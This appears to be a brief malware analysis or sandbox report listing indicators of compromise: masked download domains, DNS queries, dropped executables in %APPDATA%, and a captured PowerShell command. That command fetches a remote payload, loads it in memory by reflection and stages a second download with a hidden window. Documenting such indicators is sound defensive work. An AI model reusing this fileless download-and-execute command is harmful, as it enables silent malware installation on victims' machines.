Technical Information
- http://da###rypt.info/i6vsheq6.tmp
- %APPDATA%\qvwzmfca.ona.exe
- %APPDATA%\vagiokmfpcpur.exe
- http://da###rypt.info/I6vSHeQ6.tmp
- DNS ASK or#####ystardust.com
- DNS ASK da###rypt.info
- '%APPDATA%\qvwzmfca.ona.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' [reflection.assembly]::load((New-Object Net.WebClient).DownloadData('http://da###rypt.info/I6vSHeQ6.tmp'));[sxT]::oEr('http://da###rypt.info/arrays/178BFBFF00670F00-VagiokmFPCPUr.tmp', 'RegAsm....' (with hidden window)